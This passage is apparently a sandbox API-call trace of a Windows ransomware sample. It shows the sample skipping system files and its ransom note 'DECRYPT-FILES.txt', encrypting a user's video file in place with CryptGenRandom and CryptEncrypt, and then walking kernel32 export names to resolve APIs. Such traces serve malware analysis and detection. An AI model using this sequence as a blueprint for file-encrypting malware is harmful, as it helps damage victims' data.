nFileSizeHigh=0x0, nFileSizeLow=0x6a68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r6V0OBcF8C5j1Z.mkv", cAlternateFileName="R6V0OB~1.MKV")) returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="autorun.inf") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="boot.ini") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="desktop.ini") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="ntuser.dat") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="iconcache.db") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="bootsect.bak") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="ntuser.dat.log") returned 1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="thumbs.db") returned -1 [0087.770] lstrcmpiW (lpString1="r6V0OBcF8C5j1Z.mkv", lpString2="Bootfont.bin") returned 1 [0087.770] lstrlenW (lpString="r6V0OBcF8C5j1Z.mkv") returned 18 [0087.770] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0087.770] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0087.770] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0087.770] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0087.770] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.770] lstrlenW (lpString="r6V0OBcF8C5j1Z.mkv") returned 18 [0087.770] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="r6V0OBcF8C5j1Z.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv" [0087.770] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6V0OBcF8C5j1Z.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6v0obcf8c5j1z.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.770] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=27240) returned 1 [0087.770] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.771] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.771] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.771] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.771] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.771] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.771] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.772] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.772] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.773] CloseHandle (hObject=0x414) returned 1 [0087.773] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.773] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.774] CloseHandle (hObject=0x0) returned 0 [0087.774] CloseHandle (hObject=0x410) returned 1 [0087.774] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.774] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.774] GetTickCount () returned 0x114e62b [0087.774] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.775] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.775] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.775] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.775] lstrlenA (lpString="kernel32.dll") returned 12 [0087.775] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.775] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.775] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.776] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.776] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.776] lstrlenA (lpString="ADDATOMA") returned 8 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.776] lstrlenA (lpString="ADDATOMW") returned 8 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.776] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.776] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.776] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.776] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.776] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.776] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.776] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.776] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.776] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.776] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.776] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.776] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.776] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.776] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.776] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.776] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.777] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.777] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.777] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.777] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.777] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.777] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.777] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.777] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.777] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.777] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.777] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.777] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.777] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.777] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.777] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.777] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.778] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.778] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.778] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.778] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.778] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.778] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.778] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.778] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.778] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.778] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.778] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.778] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.778] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.778] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.778] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.778] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.778] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.778] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.779] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.779] lstrlenA (lpString="BEEP") returned 4 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.779] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.779] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.779] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.779] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.779] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.779] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.779] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.779] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.779] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.779] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.779] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.779] lstrlenA (lpString="CANCELIO") returned 8 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.779] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.779] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.779] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.779] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.779] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.779] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.780] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.780] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.780] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.780] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.780] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.780] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.780] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.780] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.780] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.780] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.780] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.780] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.780] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.780] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.780] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.780] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.780] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.780] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.780] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.781] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.781] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.781] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.781] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.781] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.781] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.781] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: 